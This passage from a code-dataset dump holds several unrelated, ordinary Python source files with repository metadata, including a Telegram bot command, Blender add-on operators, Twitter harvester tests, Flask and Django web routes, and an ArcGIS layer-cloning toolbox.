[]\r\n result.append(\" \".join(list(text)))\r\n for pos, symbol in enumerate(text[1:]):\r\n result.append(symbol + \" \" + \" \" * pos + symbol)\r\n result = list(\"\\n\".join(result))\r\n result[0] = text[0]\r\n result = \"\".join(result)\r\n msg = \"```\\n\" + result + \"```\"\r\n return update.effective_message.reply_text(msg, parse_mode=\"MARKDOWN\")\r\n\r\n\r\nSHOUT_HANDLER = DisableAbleCommandHandler(\r\n \"shout\", shout, pass_args=True, run_async=True\r\n)\r\n\r\ndispatcher.add_handler(SHOUT_HANDLER)\r\n\r\n__command_list__ = [\"shout\"]\r\n__handlers__ = [SHOUT_HANDLER]\r\n","repo_name":"rshero/YuiiChan","sub_path":"tg_bot/modules/shout.py","file_name":"shout.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"48"} +{"seq_id":"3206093803","text":"# Uses python3\nimport sys\n\ndef get_change(m):\n\n coins = 0\n\n while m:\n while m - 10 >= 0:\n m -= 10\n coins += 1\n while m - 5 >= 0:\n m -= 5\n coins += 1\n while m - 1 >= 0:\n m -= 1\n coins += 1\n\n return coins\n\n # The below is a one-line answer...but it isn't greedy!\n # return num % 5+((num-(num % 5)) % 10 // 5) + ((num - (num % 10)) // 10)\n\nif __name__ == '__main__':\n num = int(sys.stdin.read())\n print(get_change(num))\n","repo_name":"lukewrites/Data-Structures-and-Algorithms","sub_path":"1_algorithmic_toolbox/wk3_change.py","file_name":"wk3_change.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71996246546","text":"# Copyright (c) 2016-2019, Thomas Larsson\r\n# All rights reserved.\r\n#\r\n# Redistribution and use in source and binary forms, with or without\r\n# modification, are permitted provided that the following conditions are met:\r\n#\r\n# 1. Redistributions of source code must retain the above copyright notice, this\r\n# list of conditions and the following disclaimer.\r\n# 2. Redistributions in binary form must reproduce the above copyright notice,\r\n# this list of conditions and the following disclaimer in the documentation\r\n# and/or other materials provided with the distribution.\r\n#\r\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\r\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\r\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\r\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR\r\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\r\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\r\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\r\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\r\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\r\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\r\n#\r\n# The views and conclusions contained in the software and documentation are those\r\n# of the authors and should not be interpreted as representing official policies,\r\n# either expressed or implied, of the FreeBSD Project.\r\n\r\n\r\nimport bpy\r\nfrom bpy.props import *\r\n#from .drivers import *\r\nfrom .utils import *\r\nfrom .error import *\r\nif bpy.app.version < (2,80,0):\r\n from .buttons27 import PrefixString\r\nelse:\r\n from .buttons28 import PrefixString\r\n\r\n\r\ndef getMaskName(string):\r\n return \"Mask_\" + string.split(\".\",1)[0]\r\n\r\ndef getHidePropName(string):\r\n return \"Mhh\" + string.split(\".\",1)[0]\r\n\r\ndef getHideMannequinName():\r\n return \"MhhMannequin\"\r\n\r\n#------------------------------------------------------------------------\r\n# Setup: Add and remove hide drivers\r\n#------------------------------------------------------------------------\r\n\r\nclass HidersHandler:\r\n \r\n def execute(self, context):\r\n from .morphing import prettifyAll\r\n from .driver import updateAll\r\n rig = context.object\r\n for ob in self.getMeshesInGroup(context, rig):\r\n self.handleHideDrivers(ob, rig, context)\r\n setattr(ob, self.flag, self.value)\r\n setattr(rig, self.flag, self.value)\r\n prettifyAll(context)\r\n updateAll(context)\r\n setActiveObject(context, rig)\r\n return{'FINISHED'}\r\n\r\n\r\n def getMeshesInGroup(self, context, rig): \r\n self.collection = None \r\n meshes = list(rig.children)\r\n if bpy.app.version >= (2,80,0):\r\n for coll in bpy.data.collections:\r\n if rig in coll.all_objects.values():\r\n for ob in meshes:\r\n if ob in coll.all_objects.values():\r\n self.collection = coll\r\n return meshes\r\n return meshes\r\n\r\n\r\n def handleHideDrivers(self, clo, rig, context):\r\n if clo.DazMannequin:\r\n prop = getHideMannequinName()\r\n return\r\n else:\r\n prop = getHidePropName(clo.name)\r\n self.handleProp(prop, clo, rig, context)\r\n if clo.DazMannequin:\r\n return \r\n modname = getMaskName(clo.name)\r\n for ob in rig.children:\r\n for mod in ob.modifiers:\r\n if (mod.type == 'MASK' and mod.name == modname):\r\n self.handleMod(prop, rig, mod)\r\n\r\n\r\nclass DAZ_OT_AddHiders(bpy.types.Operator, HidersHandler):\r\n bl_idname = \"daz.add_hide_drivers\"\r\n bl_label = \"Add Visibility Drivers\"\r\n bl_description = \"Control visibility with rig property. For file linking.\"\r\n bl_options = {'UNDO'}\r\n \r\n flag = \"DazVisibilityDrivers\"\r\n value = True\r\n\r\n @classmethod\r\n def poll(self, context):\r\n ob = context.object\r\n return (ob and ob.type == 'ARMATURE' and not ob.DazVisibilityDrivers)\r\n\r\n\r\n def handleProp(self, prop, clo, rig, context):\r\n from .driver import setBoolProp, makePropDriver\r\n if context.scene.DazHideOnlyMasked:\r\n masked = False\r\n for ob in rig.children:\r\n if ob.type == 'MESH':\r\n for mod in ob.modifiers:\r\n if (mod.type == 'MASK' and \r\n mod.name == getMaskName(clo.name)):\r\n masked = True\r\n break\r\n if not masked:\r\n return\r\n setBoolProp(rig, prop, True, \"Show %s\" % clo.name)\r\n makePropDriver(prop, clo, HideViewport, rig, expr=\"not(x)\")\r\n makePropDriver(prop, clo, \"hide_render\", rig, expr=\"not(x)\")\r\n\r\n \r\n def handleMod(self, prop, rig, mod):\r\n from .driver import makePropDriver\r\n makePropDriver(prop, mod, \"show_viewport\", rig, expr=\"x\")\r\n makePropDriver(prop, mod, \"show_render\", rig, expr=\"x\")\r\n\r\n\r\nclass DAZ_OT_RemoveHiders(bpy.types.Operator, HidersHandler):\r\n bl_idname = \"daz.remove_hide_drivers\"\r\n bl_label = \"Remove Visibility Drivers\"\r\n bl_description = \"Remove ability to control visibility from rig property\"\r\n bl_options = {'UNDO'}\r\n\r\n flag = \"DazVisibilityDrivers\"\r\n value = False\r\n\r\n @classmethod\r\n def poll(self, context):\r\n ob = context.object\r\n return (ob and ob.type == 'ARMATURE' and ob.DazVisibilityDrivers)\r\n\r\n def handleProp(self, prop, clo, rig, context):\r\n if prop in rig.keys():\r\n del rig[prop]\r\n clo.driver_remove(HideViewport)\r\n clo.driver_remove(\"hide_render\")\r\n\r\n def handleMod(self, prop, rig, mod):\r\n mod.driver_remove(\"show_viewport\")\r\n mod.driver_remove(\"show_render\")\r\n\r\n#------------------------------------------------------------------------\r\n# Hider collections\r\n#------------------------------------------------------------------------\r\n\r\nif bpy.app.version >= (2,80,0):\r\n \r\n class DAZ_OT_AddHiderCollections(bpy.types.Operator, HidersHandler):\r\n bl_idname = \"daz.add_hide_collections\"\r\n bl_label = \"Add Visibility Collections\"\r\n bl_description = \"Control visibility with rig property. For file linking.\"\r\n bl_options = {'UNDO'}\r\n \r\n flag = \"DazVisibilityCollections\"\r\n value = True\r\n \r\n @classmethod\r\n def poll(self, context):\r\n ob = context.object\r\n return (ob and ob.type == 'ARMATURE' and not ob.DazVisibilityCollections)\r\n\r\n def getMeshesInGroup(self, context, rig):\r\n meshes = HidersHandler.getMeshesInGroup(self, context, rig)\r\n return [rig] + meshes\r\n \r\n def handleProp(self, prop, clo, rig, context):\r\n if self.collection is None:\r\n return\r\n subcoll = bpy.data.collections.new(clo.name)\r\n self.collection.children.link(subcoll)\r\n if clo in self.collection.objects.values():\r\n self.collection.objects.unlink(clo)\r\n subcoll.objects.link(clo)\r\n \r\n def handleMod(self, prop, rig, mod):\r\n return\r\n \r\n \r\n class DAZ_OT_RemoveHiderCollections(bpy.types.Operator, HidersHandler):\r\n bl_idname = \"daz.remove_hide_collections\"\r\n bl_label = \"Remove Visibility Collections\"\r\n bl_description = \"Remove ability to control visibility from rig property\"\r\n bl_options = {'UNDO'}\r\n \r\n flag = \"DazVisibilityCollections\"\r\n value = False\r\n \r\n @classmethod\r\n def poll(self, context):\r\n ob = context.object\r\n return (ob and ob.type == 'ARMATURE' and ob.DazVisibilityCollections)\r\n \r\n def getMeshesInGroup(self, context, rig):\r\n meshes = HidersHandler.getMeshesInGroup(self, context, rig)\r\n return [rig] + meshes\r\n \r\n def handleProp(self, prop, clo, rig, context):\r\n if self.collection is None:\r\n return\r\n for subcoll in self.collection.children.values():\r\n if clo in subcoll.objects.values():\r\n if subcoll in self.collection.children.values():\r\n self.collection.children.unlink(subcoll)\r\n subcoll.objects.unlink(clo)\r\n self.collection.objects.link(clo)\r\n break\r\n \r\n def handleMod(self, prop, rig, mod):\r\n return\r\n\r\n#------------------------------------------------------------------------\r\n# Show/Hide all\r\n#------------------------------------------------------------------------\r\n\r\ndef setAllVisibility(context, prefix, value):\r\n from .morphing import autoKeyProp\r\n rig = context.object\r\n scn = context.scene\r\n if rig is None:\r\n return\r\n for key in rig.keys():\r\n if key[0:3] == prefix:\r\n if key:\r\n rig[key] = value\r\n autoKeyProp(rig, key, scn, scn.frame_current, True)\r\n updateScene(context)\r\n\r\n\r\nclass DAZ_OT_ShowAll(bpy.types.Operator, PrefixString):\r\n bl_idname = \"daz.show_all\"\r\n bl_label = \"Show All\"\r\n bl_description = \"Show all meshes/makeup of this rig\"\r\n bl_options = {'UNDO'}\r\n\r\n def execute(self, context):\r\n scn = context.scene\r\n setAllVisibility(context, self.prefix, True)\r\n return{'FINISHED'}\r\n\r\n\r\nclass DAZ_OT_HideAll(bpy.types.Operator, PrefixString):\r\n bl_idname = \"daz.hide_all\"\r\n bl_label = \"Hide All\"\r\n bl_description = \"Hide all meshes/makeup of this rig\"\r\n bl_options = {'UNDO'}\r\n\r\n def execute(self, context):\r\n scn = context.scene\r\n setAllVisibility(context, self.prefix, False)\r\n return{'FINISHED'}\r\n\r\n#------------------------------------------------------------------------\r\n# Mask modifiers\r\n#------------------------------------------------------------------------\r\n\r\ndef createMaskModifiers(context, useSelectedOnly):\r\n from .proxy import getSelectedObjects\r\n selected,_ = getSelectedObjects(context, 'MESH')\r\n ob = context.object\r\n scn = context.scene\r\n rig = ob.parent\r\n print(\"Create masks for %s:\" % ob.name)\r\n if rig:\r\n for child in rig.children:\r\n if child.type == 'ARMATURE' and child.children:\r\n mesh = child.children[0]\r\n elif child.type == 'MESH':\r\n mesh = child\r\n else:\r\n mesh = None\r\n if mesh and mesh != ob:\r\n if useSelectedOnly and mesh not in selected:\r\n continue\r\n mod = None\r\n for mod1 in ob.modifiers:\r\n modname = getMaskName(mesh.name)\r\n if mod1.type == 'MASK' and mod1.name == modname:\r\n mod = mod1\r\n if modname in ob.vertex_groups.keys():\r\n vgrp = ob.vertex_groups[modname]\r\n else:\r\n vgrp = ob.vertex_groups.new(name=modname)\r\n print(\" \", mesh.name)\r\n if mod is None:\r\n mod = ob.modifiers.new(modname, 'MASK')\r\n mod.vertex_group = modname\r\n mod.invert_vertex_group = True\r\n print(\"Masks created\")\r\n\r\n\r\nclass DAZ_OT_CreateMasks(bpy.types.Operator):\r\n bl_idname = \"daz.create_all_masks\"\r\n bl_label = \"Create All Masks\"\r\n bl_description = \"Create vertex groups and mask modifiers in active mesh for all meshes belonging to same character\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return (context.object and context.object.type == 'MESH')\r\n\r\n def execute(self, context):\r\n try:\r\n createMaskModifiers(context, False)\r\n except DazError:\r\n handleDazError(context)\r\n return{'FINISHED'}\r\n\r\n\r\nclass DAZ_OT_CreateSelectedMasks(bpy.types.Operator):\r\n bl_idname = \"daz.create_selected_masks\"\r\n bl_label = \"Create Selected Masks\"\r\n bl_description = \"Create vertex groups and mask modifiers in active mesh for selected meshes\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return (context.object and context.object.type == 'MESH')\r\n\r\n def execute(self, context):\r\n try:\r\n createMaskModifiers(context, True)\r\n except DazError:\r\n handleDazError(context)\r\n return{'FINISHED'}\r\n\r\n#----------------------------------------------------------\r\n# Create collections\r\n#----------------------------------------------------------\r\n\r\nclass DAZ_OT_CreateCollections(bpy.types.Operator):\r\n bl_idname = \"daz.create_collections\"\r\n bl_label = \"Create Collections\"\r\n bl_description = \"Create collections for each empty in scene\"\r\n bl_options = {'UNDO'}\r\n\r\n def execute(self, context):\r\n try:\r\n coll = context.collection\r\n for ob in list(coll.objects):\r\n if ob.type == 'EMPTY':\r\n subcoll = bpy.data.collections.new(ob.name)\r\n coll.children.link(subcoll)\r\n coll.objects.unlink(ob)\r\n subcoll.objects.link(ob)\r\n except DazError:\r\n handleDazError(context)\r\n return{'FINISHED'}\r\n \r\n#----------------------------------------------------------\r\n# Initialize\r\n#----------------------------------------------------------\r\n\r\nclasses = [\r\n DAZ_OT_AddHiders,\r\n DAZ_OT_RemoveHiders,\r\n DAZ_OT_ShowAll,\r\n DAZ_OT_HideAll,\r\n DAZ_OT_CreateMasks,\r\n DAZ_OT_CreateSelectedMasks,\r\n]\r\n\r\nif bpy.app.version >= (2,80,0):\r\n classes += [\r\n DAZ_OT_AddHiderCollections,\r\n DAZ_OT_RemoveHiderCollections,\r\n DAZ_OT_CreateCollections,\r\n ]\r\n\r\ndef initialize():\r\n bpy.types.Object.DazVisibilityDrivers = BoolProperty(default = False)\r\n bpy.types.Object.DazVisibilityCollections = BoolProperty(default = False)\r\n\r\n bpy.types.Scene.DazHideOnlyMasked = BoolProperty(\r\n name = \"Hide Only Masked\",\r\n description = \"Create visibility drivers only for masked meshes\",\r\n default = False)\r\n\r\n for cls in classes:\r\n bpy.utils.register_class(cls)\r\n\r\n\r\ndef uninitialize():\r\n for cls in classes:\r\n bpy.utils.unregister_class(cls)\r\n\r\n\r\n","repo_name":"Diffeomorphic/import-daz","sub_path":"hide.py","file_name":"hide.py","file_ext":"py","file_size_in_byte":14507,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} +{"seq_id":"25994859205","text":"from django.conf.urls import url\nfrom g4emma import views\n\nurlpatterns = [\n url(r'^$', views.home, name='home'),\n url(r'^about/$', views.about, name='about'),\n url(r'^manual/$', views.manual, name='manual'),\n url(r'^simulation/$', views.simulation, name='simulation'),\n url(r'^tools/$', views.tools, name='tools'),\n url(r'^results/$', views.results, name='results'),\n url(r'^progress/$', views.progress, name='progress'),\n url(r'^tools/rigidity/$', views.rigidity, name='rigidity'),\n url(r'^tools/energy_loss/$', views.energy_loss, name='energy_loss'),\n url(r'^tools/charge_state/$', views.charge_state, name='charge_state'),\n url(r'^tools/charge_state_results/$', views.charge_state_results, name='charge_state_results'),\n url(r'^tools/multiple_scattering/$', views.multiple_scattering, name='multiple_scattering'), \n url(r'^tools/multiple_scattering/multiple_scattering_info/$', views.multiple_scattering_info, name='multiple_scattering_info'),\n url(r'^tools/transmission_efficiency/$', views.transmission_efficiency_view, name='transmission_efficiency'),\n]\n","repo_name":"julianaangel/emma-site","sub_path":"g4emma/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43426379393","text":"import tests\nimport socialfeedharvester.fetchables.twitter as twitter\nfrom mock import MagicMock\nfrom sfh import SocialFeedHarvester\nfrom socialfeedharvester.fetchables.resource import Image, UnknownResource\n\n\nclass TestTwitter(tests.TestCase):\n def setUp(self):\n if not tests.test_config_available:\n self.skipTest(\"Skipping test since test config not available.\")\n self.api = twitter.client_manager.get_client(tests.TWITTER_CONSUMER_KEY, tests.TWITTER_CONSUMER_SECRET,\n access_token=tests.TWITTER_ACCESS_TOKEN,\n access_token_secret=tests.TWITTER_ACCESS_TOKEN_SECRET)\n self.mock_sfh = MagicMock(spec=SocialFeedHarvester)\n self.mock_sfh.get_auth.return_value= {\"consumer_key\": tests.TWITTER_CONSUMER_KEY,\n \"consumer_secret\": tests.TWITTER_CONSUMER_SECRET,\n \"access_token\": tests.TWITTER_ACCESS_TOKEN,\n \"access_token_secret\": tests.TWITTER_ACCESS_TOKEN_SECRET}\n\n def test_lookup_user_ids(self):\n user_ids = twitter.lookup_user_ids((\"jlittman_dev\", \"xjlittman_dev\"), self.api)\n self.assertEqual(1, len(user_ids))\n self.assertEqual(2875189485, user_ids[\"jlittman_dev\"])\n\n def test_user_timeline(self):\n u = twitter.UserTimeline(self.mock_sfh, screen_name=\"jlittman_dev\", per_page=3, incremental=False)\n\n #Hostname\n self.assertEqual(\"api.twitter.com\", u.hostname)\n\n warc_records, fetchables = u.fetch()\n\n #Warc records\n #3 pages\n self.assertEqual(6, len(warc_records))\n #First should be a request\n self.assertEqual(\"request\", warc_records[0].type)\n self.assertEqual(\n \"https://api.twitter.com/1.1/statuses/user_timeline.json?count=3&page=1&screen_name=jlittman_dev\",\n warc_records[0].url)\n #And second a response\n self.assertEqual(\"response\", warc_records[1].type)\n self.assertEqual(\n \"https://api.twitter.com/1.1/statuses/user_timeline.json?count=3&page=1&screen_name=jlittman_dev\",\n warc_records[1].url)\n\n #Fetchables\n self.assertEqual(2, len(fetchables))\n self.assertIsInstance(fetchables[0], UnknownResource)\n self.assertIsInstance(fetchables[1], Image)\n\n self.mock_sfh.get_auth.assert_called_with(\"twitter\")\n\n def test_incremental_user_timeline_no_prev_state(self):\n self.mock_sfh.get_state.return_value = None\n\n u = twitter.UserTimeline(self.mock_sfh, screen_name=\"jlittman_dev\", per_page=3, incremental=True)\n warc_records, fetchables = u.fetch()\n\n #Warc records\n #3 pages\n self.assertEqual(6, len(warc_records))\n\n #Fetchables\n self.assertEqual(2, len(fetchables))\n\n self.mock_sfh.get_state.assert_called_once_with(\"socialfeedharvester.fetchables.twitter\",\n \"jlittman_dev.last_tweet_id\")\n self.mock_sfh.set_state.assert_called_once_with(\"socialfeedharvester.fetchables.twitter\",\n \"jlittman_dev.last_tweet_id\",\n \"577866396094242816\")\n\n def test_incremental_user_timeline(self):\n self.mock_sfh.get_state.return_value = \"577868039284088832\"\n\n u = twitter.UserTimeline(self.mock_sfh, screen_name=\"jlittman_dev\", per_page=3, incremental=True)\n warc_records, fetchables = u.fetch()\n\n #Warc records\n #2 pages\n self.assertEqual(4, len(warc_records))\n\n self.mock_sfh.get_state.assert_called_once_with(\"socialfeedharvester.fetchables.twitter\",\n \"jlittman_dev.last_tweet_id\")\n self.mock_sfh.set_state.assert_called_once_with(\"socialfeedharvester.fetchables.twitter\",\n \"jlittman_dev.last_tweet_id\",\n \"577866396094242816\")\n","repo_name":"gwu-libraries/social-feed-harvester","sub_path":"tests/fetchables/test_twitter.py","file_name":"test_twitter.py","file_ext":"py","file_size_in_byte":4152,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"23366885302","text":"import argparse\nimport asyncio\nimport logging\nimport os\n\nfrom dotenv import load_dotenv\n\nfrom book_club_aggregator import BookClubAggregator\nfrom book_manager import BookManager\nfrom csv_reader import CSVReader\nfrom notion_db_API import NotionDBAPI\n\n\nasync def main(ratings_file: str = None):\n load_dotenv()\n\n print(\"Initializing the Book Club Aggregator...\")\n\n if ratings_file is None:\n # Get the current file directory\n current_dir = os.path.dirname(os.path.abspath(__file__))\n\n # Navigate up one level\n parent_dir = os.path.dirname(current_dir)\n\n # Define the file path for CSV data\n file_path = os.path.join(os.path.join(parent_dir, \"data\"), \"ratings.csv\")\n else:\n file_path = ratings_file\n\n print(f\"Reading data from CSV file: '{file_path}'\")\n\n # Read data from the CSV file\n book_data = CSVReader.read_data(file_path)\n print(\"Data successfully loaded from the CSV file.\")\n print()\n\n # Create a BookClubAggregator instance\n book_club_aggregator = BookClubAggregator(book_data)\n\n # Display statistics\n print(\"Calculating and displaying statistics:\")\n book_club_aggregator.display_stats()\n print()\n\n # Aggregate book statistics\n ratings_new = book_club_aggregator.aggregate_book_stats()\n print(\"Book statistics aggregated successfully.\")\n\n # Create a book manager instance to interact with the Notion database\n book_manager = BookManager(api=NotionDBAPI())\n print(\"Connected to the Notion database.\")\n\n # Get existing ratings from the Notion database\n ratings_existing = await book_manager.get_existing_ratings()\n print(\"Retrieved existing ratings from the Notion database.\")\n\n print(\"Updating the Notion database...\")\n\n # Update the Notion database\n await book_manager.upsert_books_to_database(ratings_new, ratings_existing)\n\n print(\"Notion database updated.\")\n\n print(\"All Done! 🎊\")\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.ERROR)\n\n # Create a command-line argument parser\n parser = argparse.ArgumentParser(description=\"Book Club Aggregator\")\n\n # Add an optional argument to specify the input ratings file\n parser.add_argument(\n \"--csv_path\",\n help=\"Input ratings file (default: use hardcoded file at 'data/ratings.csv')\",\n default=None,\n )\n\n # Parse the command-line arguments\n args = parser.parse_args()\n\n # Call the main function with the ratings file argument\n asyncio.run(main(args.csv_path))\n","repo_name":"ChocoTonic/notion_book_club_aggregator","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19522528150","text":"from flask import abort, Flask, jsonify, make_response, request\n\nimport crawler.cfg as cfg\nfrom crawler.common import logger as logger\nfrom crawler.crawl import Crawler\n\n# Flask api server\napp = Flask(__name__)\n\n\n# Not Found\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\n# Health check\n@app.route('/_health')\ndef health():\n return jsonify({'msg':\"I am ok!\"})\n\n\n# Crawler endpoint\n@app.route('/crawl', methods=['POST'])\ndef create_task():\n\n # Validate request body\n if not request.json or not 'url' in request.json:\n abort(400)\n\n # url to crawl\n url = request.json.get('url')\n logger.info(\"Request received to crawl: '%s'\" % url)\n\n # Initialize crawler\n crawler = Crawler(url)\n\n # Start crawling\n sitemap, failed = crawler.start()\n\n return jsonify({'url': url, 'failed': failed, 'sitemap': sitemap}), 201\n\n\nif __name__ == '__main__':\n app.run(port=cfg.PORT, debug=True, host='0.0.0.0')\n","repo_name":"kanchwala-yusuf/sitemap-generator","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13524812835","text":"# -*- coding: utf-8 -*-\n\nimport arcpy\nfrom datetime import datetime\nimport os\nimport traceback\n\n\nclass Toolbox(object):\n def __init__(self):\n \"\"\"Define the toolbox (the name of the toolbox is the name of the\n .pyt file).\"\"\"\n self.label = \"Toolbox\"\n self.alias = \"toolbox\"\n\n # List of tool classes associated with this toolbox\n self.tools = [LayerCloner]\n\n\nclass LayerCloner(object):\n def __init__(self):\n \"\"\"Define the tool (tool name is the name of the class).\"\"\"\n self.label = \"Layer Cloner\"\n self.description = \"Clone one or more layers with the current date suffix\"\n self.canRunInBackground = False\n\n def getParameterInfo(self):\n \"\"\"Define parameter definitions\"\"\"\n param0 = arcpy.Parameter(\n displayName=\"Select Features to Clone:\",\n name=\"in_features\",\n multiValue=True,\n datatype=[\"GPFeatureLayer\"],\n parameterType=\"Required\",\n )\n param1 = arcpy.Parameter(\n displayName=\"Cloned Output Name:\",\n name=\"out_features\",\n multiValue=True,\n datatype=\"String\",\n enabled=False,\n )\n param2 = arcpy.Parameter(\n displayName=\"Geodatabase Output Location (Workspace)\",\n name=\"in_workspace\",\n datatype=\"DEWorkspace\",\n enabled=True,\n direction=\"Input\",\n parameterType=\"Required\"\n )\n param2.defaultEnvironmentName = \"Workspace\"\n\n params = [param0, param1, param2]\n return params\n\n def isLicensed(self):\n \"\"\"Set whether tool is licensed to execute.\"\"\"\n return True\n\n def updateParameters(self, parameters):\n \"\"\"Modify the values and properties of parameters before internal\n validation is performed. This method is called whenever a parameter\n has been changed.\"\"\"\n cur_date = datetime.now().strftime(\"%Y%m%d\")\n if parameters[0].values:\n layer_names = []\n for p in parameters[0].values:\n layer_names.append(p.name + \"_\" + cur_date)\n\n layer_names_str = \";\".join(layer_names)\n parameters[1].value = layer_names_str\n\n parameters[1].enabled = True\n return\n\n def updateMessages(self, parameters):\n \"\"\"Modify the messages created by internal validation for each tool\n parameter. This method is called after internal validation.\"\"\"\n return\n\n def execute(self, parameters, messages):\n \"\"\"The source code of the tool.\"\"\"\n try:\n wkspc = parameters[2].valueAsText\n arcpy.AddMessage(f\"Workspace: {wkspc}\\n\")\n\n #Export copies of selected Features\n inFeatures = parameters[0].values\n outNames = parameters[1].values\n\n for index, item in enumerate(inFeatures):\n # arcpy.AddMessage(f'Index: {index}, Feature: {item.name}, Data Source: {item.dataSource}')\n outPath = os.path.join(wkspc, outNames[index])\n # arcpy.AddMessage(f'Output Path: {outPath}')\n \n if item.dataSource.lower()[-4:] == \".shp\":\n #arcpy.AddMessage(\"Feature is a shapefile\")\n arcpy.conversion.FeatureClassToFeatureClass(item.dataSource, wkspc, outNames[index])\n arcpy.AddMessage(f\"'{item.name}' was convereted from a Shapefile to a GDB Feature Layer and renamed {outNames[index]}\")\n else:\n #arcpy.AddMessage(\"Feature Layer detected\")\n arcpy.management.Copy(item.dataSource, outPath) \n arcpy.AddMessage(f\"'{item.name}' copied to the workspace GDB and renamed {outNames[index]}\")\n\n return\n except Exception:\n arcpy.AddMessage(f'An error occured\\n{traceback.format_exc()}')\n\n\n def postExecute(self, parameters):\n \"\"\"This method takes place after outputs are processed and\n added to the display.\"\"\"\n return\n","repo_name":"tankata/Python-Toolbox-Data-Management","sub_path":"Data_Management_Tools.pyt","file_name":"Data_Management_Tools.pyt","file_ext":"pyt","file_size_in_byte":4066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20988513736","text":"from flask_app import app\n\n\n\nfrom flask import render_template, session, redirect, request, flash\nfrom flask_app.models.rating import Rating\nfrom flask_app.models.show import Show\nimport json\nimport requests\nimport os\n\n\n\n\n# Route to process new show rating\n@app.route('/process/rating', methods=[\"POST\"])\ndef process_rating():\n \n api_input = { \"media_api_id\" : session['show_api_id'] }\n media_in_db = Show.display_show(api_input)\n \n # differentiation btwn mvoie and show\n show_type = 0\n movie_type = 0\n if session['show_type'] == \"TVSeries\":\n show_type = 1\n else:\n movie_type = 1\n \n # finding average of user ratings\n rating_total = (int(float(request.form['story'])) + int(float(request.form['characters'])) + int(float(request.form['visual_appeal'])) + int(float(request.form['enjoyment'])) + int(float(request.form['music'])) + int(float(request.form['setting']))) / 6\n \n \n # if show / movie is already in db, processing the rating\n if len(media_in_db) != 0:\n media = media_in_db[0]\n data2 ={\n 'rating_total' : rating_total,\n 'tier' : request.form['tier'],\n 'story' : request.form['story'],\n 'characters' : request.form['characters'],\n 'visual_appeal' : request.form['visual_appeal'],\n 'enjoyment' : request.form['enjoyment'],\n 'music' : request.form['music'],\n 'setting' : request.form['setting'],\n 'user_id' : session['user_id'],\n 'media_id' : media.id,\n }\n \n rating = Rating.add_rating(data2)\n \n return redirect(f'/process/choice/{session[\"show_api_id\"]}')\n \n \n # if show isn't in the db, adding it, and then processing the rating\n data = {\n 'media_api_id' : session['show_api_id'],\n 'media_title' : session['show_title'],\n 'media_image' : session['show_image'],\n 'is_movie' : movie_type,\n 'is_show' : show_type\n }\n \n media_id = Show.add_media(data)\n \n data2 ={\n 'rating_total' : rating_total,\n 'tier' : request.form['tier'],\n 'story' : request.form['story'],\n 'characters' : request.form['characters'],\n 'visual_appeal' : request.form['visual_appeal'],\n 'enjoyment' : request.form['enjoyment'],\n 'music' : request.form['music'],\n 'setting' : request.form['setting'],\n 'user_id' : session['user_id'],\n 'media_id' : media_id,\n }\n \n rating = Rating.add_rating(data2)\n \n return redirect(f'/process/choice/{session[\"show_api_id\"]}')\n\n\n# route to process rating update\n@app.route('/process/rating/update', methods=[\"POST\"])\ndef update_rating():\n \n # finding average of user ratings\n rating_total = (int(float(request.form['story'])) + int(float(request.form['characters'])) + int(float(request.form['visual_appeal'])) + int(float(request.form['enjoyment'])) + int(float(request.form['music'])) + int(float(request.form['setting']))) / 6\n \n data = {\n 'id': session['rating_id'],\n 'rating_total' : rating_total,\n 'tier' : request.form['tier'],\n 'story' : request.form['story'],\n 'characters' : request.form['characters'],\n 'visual_appeal' : request.form['visual_appeal'],\n 'enjoyment' : request.form['enjoyment'],\n 'music' : request.form['music'],\n 'setting' : request.form['setting'],\n }\n \n Rating.update_rating(data)\n \n return redirect(f'/process/choice/{session[\"show_api_id\"]}')","repo_name":"davidpierce24/iMPReSSioN-python-flask-full-stack","sub_path":"flask_app/controllers/ratings.py","file_name":"ratings.py","file_ext":"py","file_size_in_byte":3506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33155593553","text":"from app import app\nfrom app.models.base_models import BaseModel\nfrom app.models.joke_model import JokeModel\nfrom app.models.user_model import UserModel\nfrom app.models.connector import MySQLConnection \n\nclass 